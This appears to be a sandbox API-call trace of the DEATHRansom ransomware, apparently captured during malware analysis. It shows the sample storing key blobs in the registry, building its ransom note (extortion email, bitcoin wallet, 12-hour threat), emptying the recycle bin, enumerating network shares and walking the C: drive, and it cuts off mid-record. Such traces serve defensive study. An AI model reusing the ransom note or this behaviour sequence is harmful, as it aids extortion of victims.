0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.870] GetProcessHeap () returned 0x280000 [0059.870] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.870] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.871] GetProcessHeap () returned 0x280000 [0059.871] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e18b0 [0059.872] GetProcessHeap () returned 0x280000 [0059.872] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.872] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b98, Size=0x84) returned 0x2f3f20 [0059.872] GetProcessHeap () returned 0x280000 [0059.872] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b98 [0059.872] GetProcessHeap () returned 0x280000 [0059.872] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b78 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x3772a8, Size=0x80) returned 0x2e18b0 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f1b90 | out: hHeap=0x280000) returned 1 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47b78 | out: hHeap=0x280000) returned 1 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2f3f20 | out: hHeap=0x280000) returned 1 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b78 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b78, Size=0x80) returned 0x2e1938 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b58, Size=0x100) returned 0x7d52158 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b58 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b58, Size=0x100) returned 0x7d52260 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x100) returned 0x7d52368 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d52368, Size=0x104) returned 0x2f1b90 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b88, Size=0x104) returned 0x2f1dc0 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b78, Size=0x8) returned 0x7d47b88 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b98, Size=0x8) returned 0x7d47b78 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47b98 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ba8 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b98, Size=0x100) returned 0x7d52368 [0059.893] GetProcessHeap () returned 0x280000 [0059.893] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x100) returned 0x7d52158 [0059.893] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47b38, Size=0x100) returned 0x7d52158 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e18b0 | out: hHeap=0x280000) returned 1 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d52050 | out: hHeap=0x280000) returned 1 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x377288 | out: hHeap=0x280000) returned 1 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e0bf0 | out: hHeap=0x280000) returned 1 [0059.894] GetProcessHeap () returned 0x280000 [0059.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1938 | out: hHeap=0x280000) returned 1 [0059.894] RegSetValueExA (in: hKey=0x610, lpValueName="public", Reserved=0x0, dwType=0x3, lpData=0x40f068*, cbData=0x100 | out: lpData=0x40f068*) returned 0x0 [0059.894] SystemFunction036 (in: RandomBuffer=0x17e7a8, RandomBufferLength=0x20 | out: RandomBuffer=0x17e7a8) returned 1 [0059.900] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x220) returned 0x7d48328 [0059.900] RegSetValueExA (in: hKey=0x610, lpValueName="private", Reserved=0x0, dwType=0x3, lpData=0x7d48328*, cbData=0x220 | out: lpData=0x7d48328*) returned 0x0 [0059.901] GetProcessHeap () returned 0x280000 [0059.901] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x2d9) returned 0x7d66118 [0059.901] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: %s\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 989 [0059.901] GetProcessHeap () returned 0x280000 [0059.901] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x6b7) returned 0x7d5ce20 [0059.901] wnsprintfA (in: pszDest=0x7d5ce20, cchDest=1719, pszFmt="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: %s\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/" | out: pszDest="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0059.901] GetProcessHeap () returned 0x280000 [0059.901] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d48328 | out: hHeap=0x280000) returned 1 [0059.901] RegCloseKey (hKey=0x610) returned 0x0 [0059.902] SHEmptyRecycleBinA (hwnd=0x0, pszRootPath=0x0, dwFlags=0x1) returned 0x8000ffff [0060.555] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x17e838 | out: lphEnum=0x17e838*=0x2b2478) returned 0x0 [0060.924] GetProcessHeap () returned 0x280000 [0060.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4000) returned 0x7dbcb28 [0060.925] WNetEnumResourceW (in: hEnum=0x2b2478, lpcCount=0x17e840, lpBuffer=0x7dbcb28, lpBufferSize=0x17e83c | out: lpcCount=0x17e840, lpBuffer=0x7dbcb28, lpBufferSize=0x17e83c) returned 0x0 [0060.925] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7dbcb28, lphEnum=0x17e810 | out: lphEnum=0x17e810*=0x7d76df0) returned 0x0 [0060.949] GetProcessHeap () returned 0x280000 [0060.949] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4000) returned 0x7dc0d98 [0060.950] WNetEnumResourceW (in: hEnum=0x7d76df0, lpcCount=0x17e818, lpBuffer=0x7dc0d98, lpBufferSize=0x17e814 | out: lpcCount=0x17e818, lpBuffer=0x7dc0d98, lpBufferSize=0x17e814) returned 0x103 [0060.950] GetProcessHeap () returned 0x280000 [0060.950] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc0d98 | out: hHeap=0x280000) returned 1 [0060.950] WNetCloseEnum (hEnum=0x7d76df0) returned 0x0 [0060.950] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7dbcb48, lphEnum=0x17e810 | out: lphEnum=0x17e810*=0x7d76df0) returned 0x4b8 [0073.569] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7dbcb68, lphEnum=0x17e810 | out: lphEnum=0x17e810*=0x7d76df0) returned 0x4c6 [0073.575] WNetEnumResourceW (in: hEnum=0x2b2478, lpcCount=0x17e840, lpBuffer=0x7dbcb28, lpBufferSize=0x17e83c | out: lpcCount=0x17e840, lpBuffer=0x7dbcb28, lpBufferSize=0x17e83c) returned 0x103 [0073.575] GetProcessHeap () returned 0x280000 [0073.575] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dbcb28 | out: hHeap=0x280000) returned 1 [0073.575] WNetCloseEnum (hEnum=0x2b2478) returned 0x0 [0073.575] GetLogicalDriveStringsW (in: nBufferLength=0x7fff, lpBuffer=0x17e970 | out: lpBuffer="C:\\") returned 0x4 [0073.575] GetProcessHeap () returned 0x280000 [0073.575] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89d0048 [0073.577] wnsprintfW (in: pszDest=0x89d0048, cchDest=32767, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0073.577] GetProcessHeap () returned 0x280000 [0073.577] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.578] lstrcpyW (in: lpString1=0x89e0050, lpString2="\\\\?\\C:" | out: lpString1="\\\\?\\C:") returned="\\\\?\\C:" [0073.578] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 0 [0073.578] QueueUserWorkItem (Function=0x40a710, Context=0x89e0050, Flags=0x0) returned 1 [0073.578] GetProcessHeap () returned 0x280000 [0073.578] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89f0058 [0073.579] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0073.579] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f1ed8, dwReserved1=0x17e630, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2b2478 [0073.579] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0073.579] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0073.579] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0073.579] StrStrW (lpFirst="$recycle.bin", lpSrch="programdata") returned 0x0 [0073.579] StrStrW (lpFirst="$recycle.bin", lpSrch="$recycle.bin") returned="$recycle.bin" [0073.579] FindNextFileW (in: hFindFile=0x2b2478, lpFindFileData=0x17e5e8 | out: lpFindFileData=0x17e5e8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2f1ed8, dwReserved1=0x17e630, cFileName="Boot", cAlternateFileName="")) returned 1 [0073.579] wnsprintfW (in: pszDest=0x89f0058, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot") returned 11 [0073.579] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0073.579] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0073.580] StrStrW (lpFirst="boot", lpSrch="programdata") returned 0x0 [0073.580] StrStrW (lpFirst="boot", lpSrch="$recycle.bin") returned 0x0 [0073.580] StrStrW (lpFirst="boot", lpSrch="program files") returned 0x0 [0073.580] StrStrW (lpFirst="boot", lpSrch="windows") returned 0x0 [0073.580] StrStrW (lpFirst="boot", lpSrch="all users") returned 0x0 [0073.580] StrStrW (lpFirst="boot", lpSrch="appdata") returned 0x0 [0073.580] GetProcessHeap () returned 0x280000 [0073.580] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.581] lstrcpyW (in: lpString1=0x8a00060, lpString2="\\\\?\\C:\\Boot" | out: lpString1="\\\\?\\C:\\Boot") returned="\\\\?\\C:\\Boot" [0073.581] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 1 [0073.581] QueueUserWorkItem (Function=0x40a710, Context=0x8a00060, Flags=0x0) returned 1 [0073.581] GetProcessHeap () returned 0x280000 [0073.581] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a10068 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\*") returned 13 [0073.582] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\*", lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\.") returned 13 [0073.582] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.582] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="..", cAlternateFileName="")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\..") returned 14 [0073.582] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x2ebf9340, ftLastAccessTime.dwHighDateTime=0x1d4d597, ftLastWriteTime.dwLowDateTime=0x2ebf9340, ftLastWriteTime.dwHighDateTime=0x1d4d597, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD", cAlternateFileName="")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD") returned 15 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x469b3b00, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG") returned 19 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG1") returned 20 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BCD.LOG2") returned 20 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x240000, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0073.582] wnsprintfW (in: pszDest=0x8a10068, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\BOOTSTAT.DAT") returned 24 [0073.582] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17e370 | out: lpFindFileData=0x17e370*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, 